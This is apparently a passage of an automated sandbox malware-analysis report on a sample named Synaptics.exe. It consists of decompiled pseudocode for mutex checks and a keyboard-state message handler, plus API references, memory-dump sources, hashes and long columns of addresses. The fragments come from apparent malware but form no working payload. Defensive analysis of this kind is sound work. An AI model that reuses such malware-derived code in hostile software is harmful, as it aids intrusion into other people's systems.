                                                                                                                                                                                          0x0049a552
                                                                                                                                                                                          0x0049a55c
                                                                                                                                                                                          0x0049a55f
                                                                                                                                                                                          0x0049a569
                                                                                                                                                                                          0x0049a56c
                                                                                                                                                                                          0x0049a576
                                                                                                                                                                                          0x0049a579
                                                                                                                                                                                          0x0049a583
                                                                                                                                                                                          0x0049a586
                                                                                                                                                                                          0x0049a58b
                                                                                                                                                                                          0x0049a594
                                                                                                                                                                                          0x0049a595
                                                                                                                                                                                          0x0049a59e
                                                                                                                                                                                          0x0049a52a
                                                                                                                                                                                          0x0049a52c
                                                                                                                                                                                          0x0049a52c
                                                                                                                                                                                          0x0049a528
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0049a50b
                                                                                                                                                                                          0x0049a47d
                                                                                                                                                                                          0x0049a494
                                                                                                                                                                                          0x0049a496
                                                                                                                                                                                          0x0049a498
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0049a49a
                                                                                                                                                                                          0x0049a49a
                                                                                                                                                                                          0x0049a49b
                                                                                                                                                                                          0x0049a4a0
                                                                                                                                                                                          0x0049a4b7
                                                                                                                                                                                          0x0049a4bc
                                                                                                                                                                                          0x0049a4c4
                                                                                                                                                                                          0x0049a4ca
                                                                                                                                                                                          0x0049a4d5
                                                                                                                                                                                          0x0049a4dd
                                                                                                                                                                                          0x0049a4de
                                                                                                                                                                                          0x0049a4e6
                                                                                                                                                                                          0x0049a4eb
                                                                                                                                                                                          0x0049a4ed
                                                                                                                                                                                          0x0049a4f4
                                                                                                                                                                                          0x0049a4f4
                                                                                                                                                                                          0x0049a4f9
                                                                                                                                                                                          0x0049a4f9
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenMutexA.KERNEL32 ref: 0049A48F
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,001F0001,00000000,00000000), ref: 0049A49B
                                                                                                                                                                                          • OpenMutexA.KERNEL32 ref: 0049A4B2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000005.00000002.310346720.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000005.00000002.310337987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000005.00000002.311122230.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000005.00000002.311201870.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MutexOpen$CloseHandle
                                                                                                                                                                                          • String ID: ControlCenter -> Aktif$ControlCenter -> Pasif$InjUpdate$Synaptics.exe
                                                                                                                                                                                          • API String ID: 1942958553-1737343353
                                                                                                                                                                                          • Opcode ID: d428108fab818e64af79a4ee70c63dc9217ef6baba067ae1674d9effdf3afe59
                                                                                                                                                                                          • Instruction ID: 032596fc6928d1f920dd250c266260124ec275c25dbd90c6f41682d3cc039f83
                                                                                                                                                                                          • Opcode Fuzzy Hash: d428108fab818e64af79a4ee70c63dc9217ef6baba067ae1674d9effdf3afe59
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B5149716002009FDB00EF6ADC82A9A37A9AB54308B11457FF804EB393DA7DED19879D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0047423C Relevance: 2.5, APIs: 2, Instructions: 42COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                                                                          			E0047423C(char __eax, void* __ebx, char __edx, void* __esi, void* __eflags) {
				char _v8;
				char _v9;
				void* _t13;
				intOrPtr _t25;
				void* _t27;
				void* _t30;

				_v9 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t30);
				_push(0x4742ac);
				_push( *[fs:eax]);
				 *[fs:eax] = _t30 + 0xfffffff8;
				_t13 = E00406F90(0, 0xffffffff, E00404E80(_v8)); // executed
				_t27 = _t13;
				if(GetLastError() != 0xb7) {
					if(_t27 != 0 && _v9 == 0) {
						CloseHandle(_t27);
					}
				}
				_pop(_t25);
				 *[fs:eax] = _t25;
				_push(0x4742b3);
				return E004049C0( &_v8);
			}









                                                                                                                                                                                          0x00474244
                                                                                                                                                                                          0x00474247
                                                                                                                                                                                          0x0047424d
                                                                                                                                                                                          0x00474254
                                                                                                                                                                                          0x00474255
                                                                                                                                                                                          0x0047425a
                                                                                                                                                                                          0x0047425d
                                                                                                                                                                                          0x0047426f
                                                                                                                                                                                          0x00474274
                                                                                                                                                                                          0x00474280
                                                                                                                                                                                          0x00474288
                                                                                                                                                                                          0x00474291
                                                                                                                                                                                          0x00474291
                                                                                                                                                                                          0x00474288
                                                                                                                                                                                          0x00474298
                                                                                                                                                                                          0x0047429b
                                                                                                                                                                                          0x0047429e
                                                                                                                                                                                          0x004742ab

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406F90: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,004742AC), ref: 00474276
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,004742AC), ref: 00474291
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000005.00000002.310346720.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000005.00000002.310337987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000005.00000002.311122230.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000005.00000002.311201870.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4294037311-0
                                                                                                                                                                                          • Opcode ID: 36603981dd8dba34b869254c82a25a2595e29f96deaf7918ce84de92357ccdcd
                                                                                                                                                                                          • Instruction ID: 318a60ea147540a6397c20476c41d700bab3d71984a2db83ba3ffa28fcbaf965
                                                                                                                                                                                          • Opcode Fuzzy Hash: 36603981dd8dba34b869254c82a25a2595e29f96deaf7918ce84de92357ccdcd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3BF0F970908204AEDB11EAE59903AAF77DC9B95364F1242BBF808B22D2DB7C5D10819E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043C1FC Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0043C1FC(intOrPtr* __eax, signed int* __edx) {
				signed int _v12;
				short _v14;
				char _v16;
				signed int _v20;
				intOrPtr* _v24;
				char _v280;
				signed int _t39;
				signed int _t40;
				signed int _t46;
				intOrPtr* _t47;
				signed int _t50;
				signed int _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t67;
				signed int _t68;
				void* _t73;
				signed int* _t79;
				intOrPtr _t90;
				intOrPtr* _t96;

				_t79 = __edx;
				_t96 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
					L4:
					_t39 =  *_t79;
					if(_t39 < 0x100 || _t39 > 0x108) {
						_t40 =  *_t79;
						__eflags = _t40 - 0x200;
						if(_t40 < 0x200) {
							L30:
							__eflags = _t40 - 0xb00b;
							if(_t40 == 0xb00b) {
								E0043AB1C(_t96, _t79[1], _t40, _t79[2]);
							}
							L32:
							return  *((intOrPtr*)( *_t96 - 0x14))();
						}
						__eflags = _t40 - 0x20a;
						if(_t40 > 0x20a) {
							goto L30;
						}
						__eflags =  *(_t96 + 0x50) & 0x00000080;
						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
							L16:
							_t46 =  *_t79 - 0x200;
							__eflags = _t46;
							if(__eflags == 0) {
								L21:
								_t47 =  *0x49dbcc; // 0x49ebb8
								E0045B21C( *_t47, _t79, _t96, __eflags);
								goto L32;
							}
							_t50 = _t46 - 1;
							__eflags = _t50;
							if(_t50 == 0) {
								L22:
								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
								if(__eflags != 0) {
									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
									goto L32;
								}
								return E00403DE8(_t96, __eflags);
							}
							_t53 = _t50 - 1;
							__eflags = _t53;
							if(_t53 == 0) {
								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
								goto L32;
							}
							__eflags = _t53 == 1;
							if(_t53 == 1) {
								goto L22;
							}
							_t55 =  *0x49eb18; // 0x0
							__eflags =  *((char*)(_t55 + 0x20));
							if( *((char*)(_t55 + 0x20)) == 0) {
								goto L32;
							} else {
								_t56 =  *0x49eb18; // 0x0
								__eflags =  *(_t56 + 0x1c);
								if( *(_t56 + 0x1c) == 0) {
									goto L32;
								}
								_t90 =  *0x49eb18; // 0x0
								__eflags =  *_t79 -  *((intOrPtr*)(_t90 + 0x1c));
								if( *_t79 !=  *((intOrPtr*)(_t90 + 0x1c))) {
									goto L32;
								}
								GetKeyboardState( &_v280);
								_v20 =  *_t79;
								_v16 = E00451924( &_v280);
								_v14 = _t79[1];
								_v12 = _t79[2];
								return E00403DE8(_t96, __eflags);
							}
							goto L21;
						}
						_t67 = _t40 - 0x203;
						__eflags = _t67;
						if(_t67 == 0) {
							L15:
							 *_t79 =  *_t79 - 2;
							__eflags =  *_t79;
							goto L16;
						}
						_t68 = _t67 - 3;
						__eflags = _t68;
						if(_t68 == 0) {
							goto L15;
						}
						__eflags = _t68 != 3;
						if(_t68 != 3) {
							goto L16;
						}
						goto L15;
					}
					_v24 = E004519E0(_t96);
					if(_v24 == 0) {
						goto L32;
					}
					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
					if(_t73 == 0) {
						goto L32;
					}
				} else {
					_v24 = E004519E0(__eax);
					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
						goto L4;
					} else {
						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
						if(_t73 == 0) {
							goto L4;
						}
					}
				}
				return _t73;
			}























                                                                                                                                                                                          0x0043c208
                                                                                                                                                                                          0x0043c20a
                                                                                                                                                                                          0x0043c210
                                                                                                                                                                                          0x0043c248
                                                                                                                                                                                          0x0043c248
                                                                                                                                                                                          0x0043c24f
                                                                                                                                                                                          0x0043c288
                                                                                                                                                                                          0x0043c28a
                                                                                                                                                                                          0x0043c28f
                                                                                                                                                                                          0x0043c367
                                                                                                                                                                                          0x0043c367
                                                                                                                                                                                          0x0043c36c
                                                                                                                                                                                          0x0043c379
                                                                                                                                                                                          0x0043c379
                                                                                                                                                                                          0x0043c37e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c384
                                                                                                                                                                                          0x0043c295
                                                                                                                                                                                          0x0043c29a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c2a0
                                                                                                                                                                                          0x0043c2a4
                                                                                                                                                                                          0x0043c2ba
                                                                                                                                                                                          0x0043c2bc
                                                                                                                                                                                          0x0043c2bc
                                                                                                                                                                                          0x0043c2c1
                                                                                                                                                                                          0x0043c2ce
                                                                                                                                                                                          0x0043c2d0
                                                                                                                                                                                          0x0043c2d9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c2d9
                                                                                                                                                                                          0x0043c2c3
                                                                                                                                                                                          0x0043c2c3
                                                                                                                                                                                          0x0043c2c4
                                                                                                                                                                                          0x0043c2e3
                                                                                                                                                                                          0x0043c2e3
                                                                                                                                                                                          0x0043c2e7
                                                                                                                                                                                          0x0043c2f9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c2f9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c2ef
                                                                                                                                                                                          0x0043c2c6
                                                                                                                                                                                          0x0043c2c6
                                                                                                                                                                                          0x0043c2c7
                                                                                                                                                                                          0x0043c300
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c300
                                                                                                                                                                                          0x0043c2c9
                                                                                                                                                                                          0x0043c2ca
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c307
                                                                                                                                                                                          0x0043c30c
                                                                                                                                                                                          0x0043c310
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c312
                                                                                                                                                                                          0x0043c312
                                                                                                                                                                                          0x0043c317
                                                                                                                                                                                          0x0043c31b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c31f
                                                                                                                                                                                          0x0043c325
                                                                                                                                                                                          0x0043c328
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c331
                                                                                                                                                                                          0x0043c338
                                                                                                                                                                                          0x0043c346
                                                                                                                                                                                          0x0043c34d
                                                                                                                                                                                          0x0043c354
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c360
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c310
                                                                                                                                                                                          0x0043c2a6
                                                                                                                                                                                          0x0043c2a6
                                                                                                                                                                                          0x0043c2ab
                                                                                                                                                                                          0x0043c2b7
                                                                                                                                                                                          0x0043c2b7
                                                                                                                                                                                          0x0043c2b7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c2b7
                                                                                                                                                                                          0x0043c2ad
                                                                                                                                                                                          0x0043c2ad
                                                                                                                                                                                          0x0043c2b0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c2b2
                                                                                                                                                                                          0x0043c2b5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c2b5
                                                                                                                                                                                          0x0043c25f
                                                                                                                                                                                          0x0043c266
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c275
                                                                                                                                                                                          0x0043c27d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c283
                                                                                                                                                                                          0x0043c212
                                                                                                                                                                                          0x0043c219
                                                                                                                                                                                          0x0043c220
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c22e
                                                                                                                                                                                          0x0043c23d
                                                                                                                                                                                          0x0043c242
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c242
                                                                                                                                                                                          0x0043c220
                                                                                                                                                                                          0x0043c38d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0043C331
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000005.00000002.310346720.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000005.00000002.310337987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000005.00000002.311122230.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000005.00000002.311201870.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: KeyboardState
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1724228437-0
                                                                                                                                                                                          • Opcode ID: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                                                                                                                                                          • Instruction ID: 91b3d7ef9cae681235685cdbb9a2033184f7e3317d8ce185dcb9f17e25b61164
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1941A131A006158FDB20DBA9C4C86AFB7A1AB0E704F1491A7E801FB3A5C738DD45C79A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%